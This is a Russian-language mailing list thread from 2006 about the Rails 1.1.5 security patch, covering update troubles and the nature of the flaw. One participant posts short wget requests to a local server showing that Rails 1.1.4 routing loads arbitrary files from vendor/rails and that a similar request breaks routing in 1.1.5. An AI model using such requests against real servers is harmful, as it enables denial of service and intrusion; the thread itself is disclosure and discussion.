дыра в раилс

[Sarmanov Alex]

1.1.5

http://weblog.rubyonrails.com/2006/8/9/rails-1-1-5-mandatory-security-patch-and-other-tidbits

[Anton]

А у всех получилось обновиться? У меня
стабильно забирает 1.1.4, а если указываю
--version 1.1.5, то ругается, что такая в
репозитории не найдена :( Правда, я за
прокси, может быть оно как-то кеширует?
Нет ли методов форсировать обход
проксевого кеша при gem install? Я в хелпе не
нашёл...

С уважением,
Антон

[Anatol Pomozov]

На Ubuntu обновилось без проблем, под
виндой выдало что-то вроде Zip::Buffer exception.

Установил rubyzip после этого смог
обновиться.

[Anatol Pomozov]

Sarmanov Alex wrote:
> 1.1.5
http://weblog.rubyonrails.com/2006/8/9/rails-1-1-5-mandatory-security-patch-and-other-tidbits

Интересно а что за такая мега-важная
секурити дыра??...

[Lugovoi Nikolai]

Exploit:

Rails 1.1.4
script/server -e production
wget http://127.0.0.1:3000/breakpoint_client

очевидно, баг в routing : если в 1.1.3 его еще не было, а в 1.1.4 код
traverse_to_controller был существенно переписан.

2006/8/10, Anatol Pomozov <anatol....@gmail.com>:

[Lugovoi Nikolai]

2006/8/10, Lugovoi Nikolai <meadow...@gmail.com>:

> Exploit:
>
> Rails 1.1.4
> script/server -e production
> wget http://127.0.0.1:3000/breakpoint_client

В общем, проблема в том, что можно загрузить произвольный файл из vendor/rails

[Lugovoi Nikolai]

Гм, и 1.1.5 тоже имеет подобного рода уязвимость:

чистый Rails 1.1.5 все по умолчанию,
В app/controllers/application.rb дописываю простой пример:
def hello; render_text "hello"; end

$wget http://127.0.0.1:3000/application/hello
200 OK

$wget http://127.0.0.1:3000/cgi
200 OK

$cat cgi
<html><body><h1>Application Error (Rails)</h1></body></html>

$wget http://127.0.0.1:3000/application/hello
500 Internal Server Error

Все, роутинг отвалился нафиг :(((
В журнале - routing failed for ""

[Kent Sibilev]

Это актуально только в development mode.

--
Kent
---
http://www.datanoise.com